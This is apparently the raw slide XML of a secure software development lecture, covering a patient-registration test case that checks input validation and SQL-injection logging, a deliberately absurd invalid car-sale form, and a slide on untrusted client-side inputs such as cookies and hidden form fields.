                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>, illegal state, sex, number of children&gt;10, illegal insurance, etc.) </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system should recognize the errors and give error messages.</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tester enters SQL injection attack into many fields.</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system should recognize the attack, indicate an error, and log the specific command executed.</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tester enters valid information for the new Patient and presses ‘Save’.</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system assigns the patient a patient number and displays:  ‘Record Updated’</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system should create a Patient Plan Management (Form 6.5) tab for Patients with health plans, or a Patient Bill Management tab for Patients without.</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tester confirms the creation of the new tabs and that a new encrypted transaction log saved the new patient record, including who and when the transaction was saved.</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tester confirms that SQL injection attacks and business rule violations are logged.</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2698" marR="52698" marT="0" marB="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="25000"/>
                        <a:lumOff val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1240873934"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A442F62-B8F0-418B-2481-889631519243}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test Case: Flow of Events (continued)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1647752108"/>
      </p:ext>
    </p:extLst>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1032309-5815-1417-F880-ECB65A00567D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="11"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="520700" y="1600200"/>
          <a:ext cx="8154988" cy="5097653"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" lastRow="1" lastCol="1" bandRow="1" bandCol="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="8154988">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1454535561"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2720093">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Business Rules:</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>1.  Name must include alphabetic characters.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>2.  State must be legal and zip code must be a legal zip code for the state.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>3.  Phone number must be 10+ numeric digits.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>4.  Insurance must be one of a set of accepted insurance companies, or specify ‘no insurance’.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>5.  Birth year must be between 1900 and the current year; birth month, day must be valid days.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>6.  Required fields include all fields except email, secondary phone, and if ‘no insurance’ is selected, insurance information.</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25000"/>
                        <a:lumOff val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3009058317"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2377560">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Postconditions:</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>1.  The new record has been saved into the test database. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>2. For Patients with health plans, a Patient Plan Management tab is available with information about the Patient’s plan.  For Patients without, a Patient Bill Management tab is provided.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>3. Logs exist for attack conditions: SQL attacks and violation of business rules.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>4. An encrypted transaction log includes the new records, including who and when the transaction occurred.</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25000"/>
                        <a:lumOff val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3585446405"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F8F9ADD-1EA9-0492-2D38-0EB4DF87E3EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test Case: Business Rules, Postconditions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2045254644"/>
      </p:ext>
    </p:extLst>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98AC-78B1-49A9-A676-A7971ED0AEB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reducing Vulnerabilities in Deployment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0C824A0-9442-4568-9470-104FD2B30F8A}"/>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54140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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F63BB060-58C6-47A9-BB1E-B61D840DD510}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000"/>
              <a:t>Problem:  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="4000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000"/>
              <a:t>Incorrect Input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8195" name="Text Box 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{292A53A8-3CFB-49EB-BD78-D22CE336FED8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="2057400"/>
            <a:ext cx="6873875" cy="3632200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="folHlink"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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SzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" b="1" dirty="0"/>
              <a:t>Car Sale</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Model:   Chevrolet XR2		Price $:  25.45</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>VIN: 	  1RUAFOOL32696ABC	Status: New</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Sale to:	Rubber Ducky</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>		2222 Atlantic Ocean</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>		Antarctica, NY, 00000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Phone:   911		VISA: 5553334444</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8196" name="Picture 6" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54D0046F-09E9-44DF-BFB8-70FA3BD5B3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7620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7" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60053187-ECFA-4A94-821A-2BF430102A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7620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8" descr="MCj00843820000[1]">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9F5719E-9541-4C98-A245-90E39C251E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7620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DD73D19A-4ACC-464A-B847-26EACA8EFD24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520700" y="680475"/>
            <a:ext cx="8154988" cy="735575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Problem:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Reliance on Untrusted Inputs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29699" name="Rectangle 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4842687C-5196-4EF4-8FB1-05A80F09627E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2209800"/>
            <a:ext cx="4038600" cy="3657600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>User-side data can be modified:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Configuration files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Profiles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Hidden form fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Environmental variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Registry keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29703" name="Line 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73714322-534C-48AD-9234-1826D8719AFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4800600" y="3048000"/>
            <a:ext cx="3505200" cy="30480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29704" name="Line 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A35A9739-4AAF-4384-B498-58563A94547E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="3429000"/>
            <a:ext cx="3581400" cy="30480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29705" name="Text Box 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2243034E-2AB3-480C-BFB7-59B3540E48BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-295627">
            <a:off x="5375275" y="2852738"/>
            <a:ext cx="1479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a:t>Web request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29706" name="Text Box 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E29977B-D0D4-435F-8F9C-2C30DEED0467}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="356162">
            <a:off x="5945362" y="3303385"/>
            <a:ext cx="1250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dirty="0"/>
              <a:t>Web Form</a:t>
            </a:r>
